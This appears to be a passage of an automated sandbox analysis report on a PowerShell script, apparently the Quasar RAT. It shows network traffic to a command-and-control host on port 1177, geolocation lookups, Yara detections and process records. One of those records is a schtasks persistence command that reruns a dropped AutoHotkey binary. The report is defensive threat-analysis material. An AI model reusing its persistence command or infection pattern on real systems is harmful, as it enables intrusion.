Dec 18, 2024 10:20:26.145854950 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.145894051 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.154365063 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.154457092 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.154495955 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.162544966 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.162615061 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.162656069 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.170908928 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.337990046 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:30.564353943 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:30.684176922 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:35.579741001 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:35.699508905 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:40.595838070 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:40.715698004 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:45.616467953 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:45.736159086 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:50.626322031 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:50.746452093 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:55.649138927 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:55.768802881 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:00.665501118 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:00.785382986 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:05.676438093 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:05.796246052 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:10.691360950 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:10.810924053 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:15.705671072 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:15.825833082 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:20.729646921 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:20.849284887 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:25.739106894 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:25.858836889 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:30.758064985 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:30.877675056 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:35.775187016 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:35.894742012 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:40.789113045 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:40.909106970 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:43.779654980 CET	80	49730	208.95.112.1	192.168.2.4
Dec 18, 2024 10:21:43.780966997 CET	49730	80	192.168.2.4	208.95.112.1
Dec 18, 2024 10:21:45.802661896 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:45.922472000 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:50.818336010 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:50.938759089 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:21:55.834209919 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:21:55.954224110 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:00.308197975 CET	49730	80	192.168.2.4	208.95.112.1
Dec 18, 2024 10:22:00.428735971 CET	80	49730	208.95.112.1	192.168.2.4
Dec 18, 2024 10:22:00.858460903 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:00.978595018 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:05.865145922 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:05.984819889 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:10.878418922 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:10.997993946 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:15.894342899 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:16.014091969 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:20.912269115 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:21.096800089 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:25.930140018 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:26.050865889 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:31.151093960 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:31.270586014 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:36.160660028 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:36.280659914 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:41.174117088 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:41.293912888 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:46.191596985 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:46.311305046 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:51.212507010 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:51.334259987 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:22:56.223000050 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:22:56.342591047 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:01.239537001 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:01.359170914 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:06.253077030 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:06.373157978 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:11.274023056 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:11.393932104 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:16.285458088 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:16.404958963 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:21.302800894 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:21.422894001 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:26.317137003 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:26.437336922 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:31.334860086 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:31.455054045 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:36.349684954 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:36.469454050 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:41.364690065 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:41.484724998 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:46.382776022 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:46.502351999 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:51.393322945 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:51.513000011 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:23:56.410948038 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:23:56.530579090 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:24:01.423405886 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:24:01.543215990 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:24:06.443502903 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:24:06.563308001 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:24:11.462975025 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:24:11.582648993 CET	1177	49731	66.225.254.246	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 10:20:18.929935932 CET	64134	53	192.168.2.4	1.1.1.1
Dec 18, 2024 10:20:19.068504095 CET	53	64134	1.1.1.1	192.168.2.4
Dec 18, 2024 10:20:20.496917009 CET	62775	53	192.168.2.4	1.1.1.1
Dec 18, 2024 10:20:20.816068888 CET	53	62775	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 10:20:18.929935932 CET	192.168.2.4	1.1.1.1	0xef03	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 10:20:20.496917009 CET	192.168.2.4	1.1.1.1	0x268f	Standard query (0)	feature-ssa.mywire.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 10:20:19.068504095 CET	1.1.1.1	192.168.2.4	0xef03	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 18, 2024 10:20:20.816068888 CET	1.1.1.1	192.168.2.4	0x268f	No error (0)	feature-ssa.mywire.org		66.225.254.246	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	208.95.112.1	80	7564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 10:20:19.202399969 CET	144	OUT	GET /json/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 Host: ip-api.com Connection: Keep-Alive
Dec 18, 2024 10:20:20.297431946 CET	483	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 09:20:19 GMT Content-Type: application/json; charset=utf-8 Content-Length: 306 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}

Target ID:	0
Start time:	04:20:07
Start date:	18/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:20:07
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:20:11
Start date:	18/12/2024
Path:	C:\Users\Public\Documents\AutoHotkey64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Documents\AutoHotkey64.exe"
Imagebase:	0x140000000
File size:	1'319'936 bytes
MD5 hash:	2D0600FE2B1B3BDC45D833CA32A37FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:20:11
Start date:	18/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:20:12
Start date:	18/12/2024
Path:	C:\Users\Public\Documents\AutoHotkey64.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Documents\AutoHotkey64.exe
Imagebase:	0x140000000
File size:	1'319'936 bytes
MD5 hash:	2D0600FE2B1B3BDC45D833CA32A37FDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:20:15
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x1b0000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:20:15
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x460000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.4213601750.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	04:20:15
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xf30000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1854587486.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:20:15
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x3e0000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:20:15
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xa10000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1855061423.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:20:21
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x10000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1927403521.000000000231B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:20:21
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x430000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.1930172049.000000000276B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:20:21
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x560000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000C.00000002.1927919605.000000000273B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:20:21
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x450000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1930008150.000000000270B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:20:22
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x160000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:23:00
Start date:	18/12/2024
Path:	C:\Users\Public\Documents\AutoHotkey64.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Documents\AutoHotkey64.exe
Imagebase:	0x140000000
File size:	1'319'936 bytes
MD5 hash:	2D0600FE2B1B3BDC45D833CA32A37FDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FFD9B89CC38 Relevance: 1.6, Strings: 1, Instructions: 382COMMON

Download Yara Rule

Strings

VM_H, xrefs: 00007FFD9B89CE70

Memory Dump Source

Source File: 00000000.00000002.1865297609.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID: VM_H
API String ID: 0-4064549320
Opcode ID: a226bdfc1e13466355e8568cac4e1b37fb64d7d8d9d8741227ce77f51b8ffefd
Instruction ID: c1d115cad8c175576b8d9019d2f0d9030de154740a1e34250ee1af4b6fd9a1bb
Opcode Fuzzy Hash: a226bdfc1e13466355e8568cac4e1b37fb64d7d8d9d8741227ce77f51b8ffefd
Instruction Fuzzy Hash: E3B16A22B1DA5A4FEB59F72CA8655E6BB91EF9531470502FBD04EC31D7ED25B8038380

Function 00007FFD9B89CCE3 Relevance: 1.6, Strings: 1, Instructions: 331COMMON

Download Yara Rule

Strings

VM_H, xrefs: 00007FFD9B89CE70

Memory Dump Source

Source File: 00000000.00000002.1865297609.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID: VM_H
API String ID: 0-4064549320
Opcode ID: 4d5ed5811a439538c06ee5ceb1c0dbaac1c2186a79f3d8c6ca1fdda9b84c3d11
Instruction ID: a3573512d3c145b03c661550648bd091c7a37fe77a865667264328187d36c28e
Opcode Fuzzy Hash: 4d5ed5811a439538c06ee5ceb1c0dbaac1c2186a79f3d8c6ca1fdda9b84c3d11
Instruction Fuzzy Hash: 16914B2271EE4D0FDB5DE72C98655E6BB91EF99250B0542FBD04AC31D7ED25B8038380

Function 00007FFD9B960098 Relevance: .5, Instructions: 537COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1867580461.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ceebf8611c5742d390d54627ded75c3c8501a6f68bce37a773a8d9783541a1c
Instruction ID: 5cf35037172b4ee30cecceaa51cb4ecadd70d9a5c742ae57b87a35aa9742ffbb
Opcode Fuzzy Hash: 0ceebf8611c5742d390d54627ded75c3c8501a6f68bce37a773a8d9783541a1c
Instruction Fuzzy Hash: 38F13732B1EB895FE7A5DB6848E46747BE1EF95620B0A01BBD04DC71E7DE18AC06C341

Function 00007FFD9B961719 Relevance: .5, Instructions: 463COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1867580461.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5502e0e42da948c2db314390b60d6c77b1b09fedd0b0978bfac1b5801a12521
Instruction ID: ed9624d0be8a7fda2eb457f602efcff6f51705ca50d9bc7de7705c12857baac2
Opcode Fuzzy Hash: f5502e0e42da948c2db314390b60d6c77b1b09fedd0b0978bfac1b5801a12521
Instruction Fuzzy Hash: 17E17632B1EA9E5FE7A5DB6C58606B837E1EF55318B1901BBD05DC71E3DE28AC018341

Function 00007FFD9B96295A Relevance: .4, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1867580461.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfca838c99aa171696fbe1fd927b84b1a83f041b61c2ca93e108360925de66c4
Instruction ID: 9c7673643ffc531614dc146e1c884d4646200db444d8950612ef06309710d1b4
Opcode Fuzzy Hash: cfca838c99aa171696fbe1fd927b84b1a83f041b61c2ca93e108360925de66c4
Instruction Fuzzy Hash: 5DD10622B1EBC95FE7769BBC58655743BE1EF92210B0A01FFD489C71E3E919AC058342

Function 00007FFD9B8B5E10 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865297609.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62456f428b5f9de86b25a699d98ce594ed1dfe741d2ffd55efe3cc686cee8a57
Instruction ID: 055cac5a6997462f170ec59faa3df58a218c63bb333647e92c5ce6702d08a2f1
Opcode Fuzzy Hash: 62456f428b5f9de86b25a699d98ce594ed1dfe741d2ffd55efe3cc686cee8a57
Instruction Fuzzy Hash: DA71B230B19A198BEB78DB68D461A72B3D6FF9C311F14457DD04AC36A1DE35F9428B80

Function 00007FFD9B897300 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865297609.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4071020e11ea9c0c235193bca4c3dab72f8617443a3d17439926b7e32c7daa0
Instruction ID: b24ed427f7cf702daa943d62804a9af2358a25dd51f2e2ebbfbb7a3f468f15e7
Opcode Fuzzy Hash: b4071020e11ea9c0c235193bca4c3dab72f8617443a3d17439926b7e32c7daa0
Instruction Fuzzy Hash: CE51E431B0EA1E4FE7ACA76894666B477D1EF8D310F1500BDD44EC32A2ED25AD428BC1

Function 00007FFD9B962A9B Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1867580461.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0134c8f6056d45c298b8ac1174aa39da8f3d806253d1d70a44dce2616b1bb9e3
Instruction ID: 2215d8b56a0cfc3bc724d3a7e695c55b17bc1ad75a130ca570431fe1d2e87154
Opcode Fuzzy Hash: 0134c8f6056d45c298b8ac1174aa39da8f3d806253d1d70a44dce2616b1bb9e3
Instruction Fuzzy Hash: 0D012B22F2E91E9FF3B997DC646517473C2EF84220B4A05BAD40DC31D6ED09AC028245

Function 00007FFD9B962518 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1867580461.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
